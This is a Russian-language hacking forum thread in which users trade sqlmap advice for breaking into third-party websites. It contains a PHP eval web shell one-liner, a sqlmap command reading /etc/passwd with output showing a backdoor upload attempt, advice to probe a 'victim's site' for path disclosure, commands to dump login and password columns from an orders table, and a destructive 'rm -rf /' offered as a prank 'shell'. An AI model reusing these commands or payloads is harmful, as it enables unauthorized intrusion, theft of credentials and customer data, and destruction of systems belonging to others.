Старый 28.02.2012, 15:59   #41
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Цитата:
Сообщение от Shadowfolder Посмотреть сообщение
и как можно будет туда записать шелл? что такое "rm -rf /?
Это и есть мини шелл, для парней со стальными яйцами.
Lostnull вне форума   Ответить с цитированием
Старый 29.02.2012, 07:52   #42
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

и как потом к нему обратится, чтобы юзать?команда rm ведь для удаления же
Shadowfolder вне форума   Ответить с цитированием
Старый 29.02.2012, 08:01   #43
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

залей в него <?php eval($_GET[a]); ?>
в чем проблема-то?
faza02 вне форума   Ответить с цитированием
Старый 29.02.2012, 22:26   #44
fawkes
 
Регистрация: 29.02.2012
Сообщений: 0
Репутация: 0
По умолчанию нуждаться в помощи

я поступил заказ:
python sqlmap.py -u "http://xxxxxxx.com/index.php?id=xxx" --os-cmd "cat /etc/passwd" -v 3
и полученные результаты в виде:

[19:06:13] [INFO] the back-end DBMS is MySQL

web application technology: Apache
back-end DBMS: MySQL 5.0
[19:06:13] [INFO] going to use a web backdoor for command execution
[19:06:13] [INFO] fingerprinting the back-end DBMS operating system
[19:06:13] [DEBUG] performed 0 queries in 0 seconds
[19:06:13] [INFO] the back-end DBMS operating system is Linux
[19:06:13] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3

[19:06:18] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]:

Я не знаю, что я должен делать больше.
Извините, я не знаю русский хорошо.
Мне нужна ваша помощь, чтобы знать, что я должен сделать в результате
fawkes вне форума   Ответить с цитированием
Старый 02.03.2012, 16:13   #45
a10nE
 
Регистрация: 31.10.2011
Сообщений: 10
Репутация: 0
По умолчанию

If I got you right, you have to input full path to a directory you want to upload shell to. This directory should exists.
Try to find path-disclosure vulnerability on victim's site, or try some default ones.
__________________
http://pix.am/G0fb.png
a10nE вне форума   Ответить с цитированием
Старый 26.03.2012, 22:27   #46
FlatL1ne
 
Аватар для FlatL1ne
 
Регистрация: 07.12.2011
Сообщений: 20
Репутация: 3
По умолчанию

Как дампить определенные колонки?

python ./sqlmap.py -u "site.com/xxx.php?" --dump -T orders --start 3 --stop 4 -D basa -v 1 -threads 10
или так
python ./sqlmap.py -u "site.com/xxx.php?" --dump -T orders -D basa -v 1 -threads 10 --start 3 --stop 4

выдает какойто бред и перестает работать.
FlatL1ne вне форума   Ответить с цитированием
Старый 27.03.2012, 00:20   #47
Ispanec
 
Регистрация: 21.02.2012
Сообщений: 4
Репутация: 1
По умолчанию

Цитата:
Сообщение от FlatL1ne Посмотреть сообщение
Как дампить определенные колонки?

python ./sqlmap.py -u "site.com/xxx.php?" --dump -T orders --start 3 --stop 4 -D basa -v 1 -threads 10
или так
python ./sqlmap.py -u "site.com/xxx.php?" --dump -T orders -D basa -v 1 -threads 10 --start 3 --stop 4

выдает какойто бред и перестает работать.

Достаточно этого:
Код:
python ./sqlmap.py -u "site.com/xxx.php?" -D basa -T orders -C id,login,pass
А вообще вот
Ispanec вне форума   Ответить с цитированием
Ответ

Метки
sqlmap для новичков, sqlmap shell

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot